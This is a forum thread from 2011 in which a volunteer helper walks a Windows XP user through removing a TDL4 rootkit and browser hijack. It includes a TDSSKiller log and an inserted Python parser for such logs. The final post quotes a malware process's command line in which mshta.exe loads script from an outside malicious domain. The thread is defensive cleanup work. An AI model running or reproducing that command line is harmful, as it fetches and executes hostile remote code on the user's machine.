Multiple malware infestation?



#1 Adam36


Posted 27 February 2011 - 09:13 PM

Hello, starting several weeks ago my wife informed me she couldn't upload pictures to Shutterfly. After searching the internet for possible causes, I found that something had changed the proxy settings in IE. I fixed it, only to find it happen again the next day. I was able to fix it and then ran Malwarebytes. It found some malware and everything worked OK for a few weeks. Then it started again. Well, I was busy, so I didn't do anything about it for a week or so. Well, I then was majorly infested. I wish I would have kept track of everything that was going on, but I didn't. Some of the things were as follows. IE would not connect to the internet but Firefox would. When searching on Google it would go to random websites, mostly selling Viagra. It would open up random tabs in Firefox. It would not let me run Malwarebytes. It would put the CPU at 100% with svchost.exe. Whenever I would try to download anything it would just go blank. It would ask what program to use to open anything I tried to open, and it wouldn't work.

Well, I ended up using my laptop and downloading Rkill and Malwarebytes on it, then changing the name of Malwarebytes to get it to run. I wish I would have kept track of what all it found, but it was a bunch. At this point I also downloaded SUPERAntiSpyware and ran it; it found a whole bunch of stuff also. At this point I bought the Malwarebytes protection module.

Everything is working better, but I still have things wrong. First off, I keep getting the "Malwarebytes successfully blocked access to a potentially malicious website (with an IP address) type: outgoing" message. Next, I still can't log onto IE; I can get on the net through Firefox. When I try to open IE it asks me what program to use to open it. It still goes to random sites when I do Google searches, but not near as much. Also, while typing this I have 23 mshta.exe running.

Ugh, what a mess. Anyways, sorry so long, and I hope this isn't too confusing. Thanks for looking this over!

Oh yeah, I am running Windows XP.



#2 Blade


Posted 04 March 2011 - 04:56 PM

Hello.

Download TFC by OldTimer to your desktop.
(TFC only cleans temp folders. It will not clean URL history, prefetch, or cookies).
Close any open windows.
  • Double-click the TFC icon to run the program.
  • TFC will close all open programs itself in order to run.
  • Click the Start button to begin the process.
  • Allow TFC to run uninterrupted.
  • The program should not take long to finish its job.
Once it's finished it should automatically reboot your machine; if it doesn't, manually reboot to ensure a complete clean.

NOTE:
It's normal after running TFC that the PC will be slower to boot the first time.

TFC (Temp File Cleaner) will clear out all temp folders for all user accounts (temp, IE temp, java, FF, Opera, Chrome, Safari), including Administrator, All Users, LocalService, NetworkService, and any other accounts in the user folder.


***************************************************

Please download and scan with SUPERAntiSpyware Free
  • Double-click SUPERAntiSpyware.exe and use the default settings for installation.
  • An icon will be created on your desktop. Double-click that icon to launch the program.
  • If it will not start, go to Start > All Programs > SUPERAntiSpyware and click on Alternate Start.
  • If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download them from here. Double-click on the hyperlink for Download Installer and save SASDEFINITIONS.EXE to your desktop. Then double-click on SASDEFINITIONS.EXE to install the definitions.)
  • In the Main Menu, click the Preferences... button.
  • Click the "General and Startup" tab, and under Start-up Options, make sure "Start SUPERAntiSpyware when Windows starts" box is unchecked.
  • Click the "Scanning Control" tab, and under Scanner Options, make sure the following are checked (uncheck all others):
    • Close browsers before scanning.
    • Scan for tracking cookies.
    • Terminate memory threats before quarantining.
  • Click the "Close" button to leave the control center screen and exit the program.
  • Do not run a scan just yet.
Reboot your computer in "Safe Mode" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode". When logging in, log in under the account that you normally use; do NOT log in under the account titled "Admin" or "Administrator" unless this account is the one used normally.

Scan with SUPERAntiSpyware as follows:
  • Launch the program and back on the main screen, under "Scan for Harmful Software" click Scan your computer.
  • On the left, make sure you check C:\Fixed Drive.
  • On the right, under "Complete Scan", choose Perform Complete Scan and click "Next".
  • After the scan is complete, a Scan Summary box will appear with potentially harmful items that were detected. Click "OK".
  • Make sure everything has a checkmark next to it and click "Next".
  • A notification will appear that "Quarantine and Removal is Complete". Click "OK" and then click the "Finish" button to return to the main menu.
  • If asked if you want to reboot, click "Yes" and reboot normally.
  • To retrieve the removal information after reboot, launch SUPERAntispyware again.
    • Click Preferences, then click the Statistics/Logs tab.
    • Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
    • If there are several logs, click the current dated log and press View log. A text file will open in your default text editor.
    • Please copy and paste the Scan Log results in your next reply.
  • Click Close to exit the program.

~Blade


In your next reply, please include the following:
SUPERAntiSpyware Log
How is the computer running now?


If I am helping you, it has been 48 hours since your last post, and I have yet to reply to your topic, please send me a PM
Become a BleepingComputer fan: Facebook
Follow us on Twitter!
Circle us on Google+


#3 Adam36


Posted 07 March 2011 - 08:46 PM

Hello Blade

I had to download TFC to my laptop and then move it over on a memory stick. I tried to run it, but it would just freeze up. I let it sit for over 30 minutes, and when I opened the Task Manager to see what was going on, I found it said TFC was not responding in the Applications tab. The only way I could close it was to manually turn off the computer by holding the power button. I tried this a few times; every time was the same.

I already have SUPERAntiSpyware, so I updated it and followed your instructions. Once I rebooted and went to get the logs, they were not there? I tried it a couple of times (it takes almost 1.5 hrs to run) and I have no logs of anything? I was able to find the log while in safe mode; the report said it didn't find anything. I tried to copy and paste it to notebook, and then save it. Once out of safe mode it is not where I left it?

Thanks again for the help!!!


Adam

#4 Blade


Posted 08 March 2011 - 11:18 AM

Hello.

Don't worry about the SUPERAntiSpyware log... if it didn't find anything then that's fine.

Please download the TDSS Rootkit Removing Tool (TDSSKiller.exe) and save it to your Desktop. <-Important!!!
Be sure to download TDSSKiller.exe from Kaspersky's website and not TDSSKiller.zip which appears to be an older version 2.3.2.2 of the tool.
  • Double-click on TDSSKiller.exe to run the tool for known TDSS variants.
    Vista/Windows 7 users right-click and select Run As Administrator.
  • If TDSSKiller does not run, try renaming it.
  • To do this, right-click on TDSSKiller.exe, select Rename and give it a random name with the .com file extension (i.e. 123abc.com). If you do not see the file extension, please refer to How to change the file extension.
  • Click the Start Scan button.
  • Do not use the computer during the scan.
  • If the scan completes with nothing found, click Close to exit.
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
  • Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.
  • A log file named TDSSKiller_version_date_time_log.txt (i.e. TDSSKiller.2.4.0.0_27.07.2010_09.07.26_log.txt) will be created and saved to the root directory (usually Local Disk C:).
  • Copy and paste the contents of that file in your next reply.

In your next reply, please include the following:
TDSSKiller Log

Edited by Blade Zephon, 08 March 2011 - 11:20 AM.



#5 Adam36


Posted 08 March 2011 - 07:29 PM

2011/03/08 19:16:57.0218 2740 TDSS rootkit removing tool 2.4.20.0 Mar 2 2011 10:44:30
2011/03/08 19:16:57.0546 2740 ================================================================================
2011/03/08 19:16:57.0546 2740 SystemInfo:
2011/03/08 19:16:57.0546 2740
2011/03/08 19:16:57.0546 2740 OS Version: 5.1.2600 ServicePack: 3.0
2011/03/08 19:16:57.0546 2740 Product type: Workstation
2011/03/08 19:16:57.0546 2740 ComputerName: HOMEPC
2011/03/08 19:16:57.0546 2740 UserName: Owner
2011/03/08 19:16:57.0546 2740 Windows directory: C:\WINDOWS
2011/03/08 19:16:57.0546 2740 System windows directory: C:\WINDOWS
2011/03/08 19:16:57.0546 2740 Processor architecture: Intel x86
2011/03/08 19:16:57.0546 2740 Number of processors: 1
2011/03/08 19:16:57.0546 2740 Page size: 0x1000
2011/03/08 19:16:57.0546 2740 Boot type: Normal boot
2011/03/08 19:16:57.0546 2740 ================================================================================
2011/03/08 19:16:58.0343 2740 Initialize success
2011/03/08 19:17:31.0187 4896 ================================================================================
2011/03/08 19:17:31.0187 4896 Scan started
2011/03/08 19:17:31.0187 4896 Mode: Manual;
2011/03/08 19:17:31.0187 4896 ================================================================================
2011/03/08 19:17:44.0078 4896 \HardDisk0 - detected Rootkit.Win32.TDSS.tdl4 (0)
2011/03/08 19:17:44.0078 4896 ================================================================================
2011/03/08 19:17:44.0078 4896 Scan finished
2011/03/08 19:17:44.0078 4896 ================================================================================
2011/03/08 19:17:44.0078 4440 Detected object count: 1
2011/03/08 19:18:13.0578 4440 \HardDisk0 - will be cured after reboot
2011/03/08 19:18:13.0578 4440 Rootkit.Win32.TDSS.tdl4(\HardDisk0) - User select action: Cure
2011/03/08 19:18:20.0968 2624 Deinitialize success





Everything seems to be working so far.



Adam
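The log Adam posted has the shape every TDSSKiller 2.4.x log has: a header, one line per enumerated driver (service name, MD5, path), and then the lines that actually matter, the detection, the count, the pending-reboot notice and the action the user picked. As an added example, not code from the thread or from Kaspersky, here is a small Python parser for that format that pulls those result lines out and cross-checks them (count consistent, every detection sent for Cure, disk-level object present); the embedded sample log is constructed to mirror the thread's format, with placeholder driver hashes.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed excerpt in the TDSSKiller 2.4.x log format seen in this thread.
# Driver hashes are placeholders, not values from a real machine.
SAMPLE_LOG = r"""
2011/03/08 19:16:57.0218 2740 TDSS rootkit removing tool 2.4.20.0 Mar 2 2011 10:44:30
2011/03/08 19:16:57.0546 2740 ================================================================================
2011/03/08 19:16:57.0546 2740 SystemInfo:
2011/03/08 19:16:57.0546 2740 OS Version: 5.1.2600 ServicePack: 3.0
2011/03/08 19:16:58.0343 2740 Initialize success
2011/03/08 19:17:31.0187 4896 Scan started
2011/03/08 19:17:31.0187 4896 Mode: Manual;
2011/03/08 19:17:32.0765 4896 ACPI (00000000000000000000000000000000) C:\WINDOWS\system32\DRIVERS\ACPI.sys
2011/03/08 19:17:38.0031 4896 MBAMProtector (11111111111111111111111111111111) C:\WINDOWS\system32\drivers\mbam.sys
2011/03/08 19:17:44.0078 4896 \HardDisk0 - detected Rootkit.Win32.TDSS.tdl4 (0)
2011/03/08 19:17:44.0078 4896 Scan finished
2011/03/08 19:17:44.0078 4440 Detected object count: 1
2011/03/08 19:18:13.0578 4440 \HardDisk0 - will be cured after reboot
2011/03/08 19:18:13.0578 4440 Rootkit.Win32.TDSS.tdl4(\HardDisk0) - User select action: Cure
2011/03/08 19:18:20.0968 2624 Deinitialize success
"""

# Every line is "<timestamp> <thread id> <message>"; the message decides what the line is.
LINE_RE = re.compile(r"^(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\.\d{4})\s+(\d+)\s+(.*)$")
VERSION_RE = re.compile(r"^TDSS rootkit removing tool (\S+) ")
OS_RE = re.compile(r"^OS Version: (.+)$")
DRIVER_RE = re.compile(r"^(\S+) \(([0-9a-fA-F]{32})\) (.+)$")           # service (md5) path
DETECT_RE = re.compile(r"^(.+?) - detected (\S+) \((\d+)\)$")           # object - detected threat (n)
PENDING_RE = re.compile(r"^(.+?) - will be cured after reboot$")
ACTION_RE = re.compile(r"^(\S+)\((.+)\) - User select action: (\w+)$")  # threat(object) - ... action
COUNT_RE = re.compile(r"^Detected object count: (\d+)$")


@dataclass
class Detection:
    target: str                    # \HardDisk0 for a disk/MBR infection, otherwise a service name
    threat: str                    # e.g. Rootkit.Win32.TDSS.tdl4
    action: Optional[str] = None   # Cure / Skip / Delete, as chosen in the tool
    pending_reboot: bool = False   # "will be cured after reboot" was logged


@dataclass
class ScanReport:
    tool_version: Optional[str] = None
    os_version: Optional[str] = None
    drivers: List[Tuple[str, str, str]] = field(default_factory=list)   # (service, md5, path)
    detections: Dict[str, Detection] = field(default_factory=dict)      # keyed by target
    reported_count: Optional[int] = None


def parse_tdsskiller_log(text: str) -> ScanReport:
    """Parse a TDSSKiller log; lines that fit none of the known shapes are skipped."""
    report = ScanReport()
    for raw in text.splitlines():
        line = LINE_RE.match(raw.strip())
        if not line:
            continue
        msg = line.group(3).strip()
        if (m := VERSION_RE.match(msg)):
            report.tool_version = m.group(1)
        elif (m := OS_RE.match(msg)):
            report.os_version = m.group(1)
        elif (m := DRIVER_RE.match(msg)):
            report.drivers.append((m.group(1), m.group(2).lower(), m.group(3)))
        elif (m := DETECT_RE.match(msg)):
            report.detections[m.group(1)] = Detection(m.group(1), m.group(2))
        elif (m := PENDING_RE.match(msg)):
            report.detections.setdefault(m.group(1), Detection(m.group(1), "?")).pending_reboot = True
        elif (m := ACTION_RE.match(msg)):
            det = report.detections.setdefault(m.group(2), Detection(m.group(2), m.group(1)))
            det.action = m.group(3)
        elif (m := COUNT_RE.match(msg)):
            report.reported_count = int(m.group(1))
    return report


def count_matches(report: ScanReport) -> bool:
    """Cross-check the tool's own count against the detection lines actually present."""
    return report.reported_count is not None and report.reported_count == len(report.detections)


def unresolved(report: ScanReport) -> List[str]:
    """Targets that were detected but not sent for Cure (user skipped, or the log is cut off)."""
    return [t for t, d in report.detections.items() if d.action != "Cure"]


def disk_level_infection(report: ScanReport) -> bool:
    """TDL4 is an MBR bootkit, so TDSSKiller reports it against the physical disk, not a driver file."""
    return any(t.lower().startswith(r"\harddisk") for t in report.detections)


if __name__ == "__main__":
    r = parse_tdsskiller_log(SAMPLE_LOG)
    print(f"TDSSKiller {r.tool_version} on {r.os_version}: {len(r.drivers)} drivers listed")
    for d in r.detections.values():
        print(f"  {d.threat} at {d.target}: action={d.action} pending_reboot={d.pending_reboot}")
    print("count consistent:", count_matches(r), "| unresolved:", unresolved(r))
```

A log that was pasted without its tail (no "User select action" line) shows up in `unresolved`, which is the case to ask the poster about before declaring the cleanup done.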

#6 Blade


Posted 09 March 2011 - 01:27 PM

Hello.

Appears that TDSSKiller took out a rootkit.

Please put the machine through its paces, and let me know if everything appears to be working properly.

~Blade



#7 Adam36


Posted 13 March 2011 - 09:28 PM

Blade,

Looks like everything seems to be working, but I do notice I still have one problem: mshta.exe keeps coming up multiple times. As I'm typing this I have 10 of them running. I'm not sure if this is some type of malware, or something else.

Thanks again


Adam

#8 Blade


Posted 14 March 2011 - 01:20 AM

Hello.

Do you have an XP CD available?



#9 Adam36


Posted 15 March 2011 - 04:19 PM

Blade,
I have the "restore DVD" that came with this computer. I also have a "windows XP operating system" from another computer I bought, but I'm not sure if it will work with this computer?

#10 Blade


Posted 17 March 2011 - 06:37 AM

Hello.

What version of XP are you running on this machine, and what version is the CD?



#11 Adam36


Posted 17 March 2011 - 06:33 PM

Hi,

I'm running Home Edition Version 2002 Service pack 3.

The one CD is from an older computer; it's Home Edition Version 1.

#12 Blade


Posted 19 March 2011 - 05:31 PM

Hello.

Let's try this.

Let's run the Windows System File Checker utility. You will need your XP CD handy.
  • Open Windows Task Manager by pressing CTRL+SHIFT+ESC.
  • Click File, then New Task (Run).
  • In the box that opens, type sfc /scannow (there is a space between c and /).
  • Click OK.
  • Let it run and insert the XP CD when asked.


Let me know what happens, and how your computer behaves after running the utility.



#13 Adam36


Posted 22 March 2011 - 07:39 PM

Blade, I ran the Windows System File Checker utility, but I'm not sure if this is right or not. I did everything I was instructed to do, and a window came up that told me to "Please wait while Windows verifies that all protected Windows files are intact and in their original versions". This took a while so I left it. I came back about 20 minutes later and it had closed out? It never asked me to insert the CD. I tried it a second time and it did the same thing. Is this correct or am I doing something wrong?

#14 Blade


Posted 24 March 2011 - 05:08 AM

If it didn't ask for the CD, then it either didn't find anything wrong, or it managed to repair everything with onboard backups.


Please download Process Explorer.

Launch the utility once it is downloaded.

Right-click a mshta.exe process and select Properties > Image. Copy what you see in the Command line: box and paste it in your next reply.

~Blade



#15 Adam36


Posted 24 March 2011 - 09:01 PM

That's a pretty neat Utility!

mshta.exe http://funnypinguinshow.com/sdad.php?kxasdasddkhjk=



